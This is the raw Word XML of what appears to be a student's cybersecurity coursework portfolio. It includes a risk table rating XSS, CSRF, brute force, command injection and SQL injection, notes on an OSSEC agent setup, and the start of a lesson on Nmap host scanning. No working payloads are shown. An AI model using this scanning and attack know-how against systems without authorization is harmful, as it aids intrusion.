        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2865DC" w14:textId="2BD88349" w:rsidR="00D96E60" w:rsidRDefault="00D96E60" w:rsidP="00D96E60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC71436" w14:textId="5745B7B1" w:rsidR="00D96E60" w:rsidRDefault="00D96E60" w:rsidP="00D96E60">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS (STORED):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A4EA47" w14:textId="170CF075" w:rsidR="00D96E60" w:rsidRDefault="00D96E60" w:rsidP="00D96E60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS Stored is slightly more dangerous because the malicious code is being saved on the victim’s memory and requires manual fixing. The probability is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D96E60">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>average</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the impact is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D96E60">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidR="00E53987">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66717246" w14:textId="4BABC089" w:rsidR="00E53987" w:rsidRPr="00D96E60" w:rsidRDefault="00E53987" w:rsidP="00E53987">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Medium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31639C" w14:textId="77777777" w:rsidR="00D96E60" w:rsidRPr="00A0109C" w:rsidRDefault="00D96E60" w:rsidP="00D96E60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F2C422" w14:textId="77777777" w:rsidR="00A0109C" w:rsidRPr="00785C7B" w:rsidRDefault="00A0109C" w:rsidP="00785C7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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610353BA" w:rsidR="00F935E5" w:rsidRDefault="00D96E60" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F40A0DD" w14:textId="1F75BA05" w:rsidR="00F935E5" w:rsidRDefault="00D96E60" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer &amp; Company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A825853" w:rsidR="00F935E5" w:rsidRDefault="00D96E60" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Command injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219236D1" w14:textId="2FDFE9D5" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="014DB2EA" w14:textId="180EBC91" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</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316DA33F" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="09FF7C2F" w14:textId="22A72D5F" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="987"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F3CA16" w14:textId="30405658" w:rsidR="00F935E5" w:rsidRDefault="00D96E60" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="139C885C" w14:textId="1DE2C2C3" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7727E724" w14:textId="09A889C2" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High (</w:t>
            </w:r>
            <w:r w:rsidR="00E53987">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</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59130F87" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1889" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="589FC757" w14:textId="451A18DA" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A84CA2E" w14:textId="2F793242" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="704E380D" w14:textId="034D2400" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="880"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="501F96E1" w14:textId="31F13E8E" w:rsidR="00F935E5" w:rsidRDefault="00D96E60" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS (DOM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66EC0922" w14:textId="61EB977A" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer &amp; Company damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08273D90" w14:textId="4DD04519" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</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42136A7C" w:rsidR="00F935E5" w:rsidRDefault="00D96E60" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS (STORED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59949724" w14:textId="5548B2A7" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer &amp; Company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C39DC4B" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Average </w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00F935E5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="300A86B0" w14:textId="5F0BCAFA" w:rsidR="00F935E5" w:rsidRDefault="00E53987" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Medium</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lastRenderedPageBreak/>
              <w:t>Very likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6752D9B9" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70777947" w14:textId="5B121981" w:rsidR="005669E8" w:rsidRDefault="005669E8" w:rsidP="00D35B72">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3274884A" w14:textId="79A95287" w:rsidR="00AB5F19" w:rsidRPr="00D35B72" w:rsidRDefault="00D35B72" w:rsidP="00D35B72">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Command injection</w:t>
            </w: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116C2A5A" w14:textId="77777777" w:rsidR="005669E8" w:rsidRDefault="00E53987" w:rsidP="00E53987">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS (DOM)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C583498" w14:textId="7DA1820D" w:rsidR="00D35B72" w:rsidRPr="005669E8" w:rsidRDefault="00D35B72" w:rsidP="00E53987">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS (STORED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EE694F1" w14:textId="51030130" w:rsidR="00AB5F19" w:rsidRPr="00E53987" w:rsidRDefault="00AB5F19" w:rsidP="00D35B72">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>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624D58B8" w:rsidR="00AB5F19" w:rsidRPr="005669E8" w:rsidRDefault="00AB5F19" w:rsidP="00D35B72">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AB6F595" w14:textId="77777777" w:rsidR="005669E8" w:rsidRDefault="00E53987" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A0B9FB4" w14:textId="77777777" w:rsidR="00E53987" w:rsidRDefault="00E53987" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D01474C" w14:textId="7AFA77F5" w:rsidR="00E53987" w:rsidRPr="005669E8" w:rsidRDefault="00E53987" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00846024">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL Injection Attack.</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5782521"/>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5782522"/>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lastRenderedPageBreak/>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pfSens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lastRenderedPageBreak/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">First, I git cloned the latest version of OSSEC from </w:t>
      </w:r>
      <w:hyperlink r:id="rId19"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3"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ip. I should get a key that is unique for windows. Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and add the server ip and unique key in the interface. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C34A09" w14:textId="1F7AB6A9" w:rsidR="006D7616" w:rsidRPr="008420E6" w:rsidRDefault="006D7616" w:rsidP="008420E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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7"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lastRenderedPageBreak/>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lastRenderedPageBreak/>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30"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4"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5782523"/>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5"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 xml:space="preserve">Let me try another trick which is adding parameters at the end of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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5782524"/>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68421295" w14:textId="1CE9D8ED" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5233BC03" w14:textId="25C0969C" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="685E9824" w14:textId="0FFF8322" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="585671F6" w14:textId="075ED691" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5C5A373D" w14:textId="0C0612B4" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="60083A50" w14:textId="36B1EE5F" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="63128E26" w14:textId="59E42743" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="20C31EEB" w14:textId="7885CE39" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="40454B08" w14:textId="3D5C4228" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1762C09D" w14:textId="428416D5" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="606CD460" w14:textId="4A1C4F66" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="3B1EE4CE" w14:textId="2B3C8A21" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="4C8BDEEB" w14:textId="2CF3A96D" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="1AB77C16" w14:textId="0C202865" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="48BA5A58" w14:textId="3028CFE4" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="28BC2337" w14:textId="549FB019" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="0D3394FD" w14:textId="0EE76297" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="5DBDE291" w14:textId="58A9B8DB" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="02257DC8" w14:textId="73571B6C" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155"/>
    <w:p w14:paraId="4D471476" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc115782525"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(BOK) Network Security (week 5-8)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="3AE8DE8A" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12AE2EA6" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc115782526"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lesson 5.1 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00E13E2E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Scanning and Enumeration + Sniffing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3F4059F7" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C83365" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75687B49" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Live Host Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E984E" w14:textId="77777777" w:rsidR="004E2155" w:rsidRPr="00D45A07" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1635BAAF" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap is the most popular network scanning tool. It was created by Gordon Lyon. I will showcase my journey on learning this great service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264796F4" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap tries to approach networks using several methods like ARP scan, ICMP scan, TCP/UDP ping scan, and many more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376DE24" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2234DA34" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>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Default="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075DA206" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap sends ping scan to find live host, then proceeds to scan them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1D7F32" w14:textId="77777777" w:rsidR="004E2155" w:rsidRDefault="004E2155" w:rsidP="004E2155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
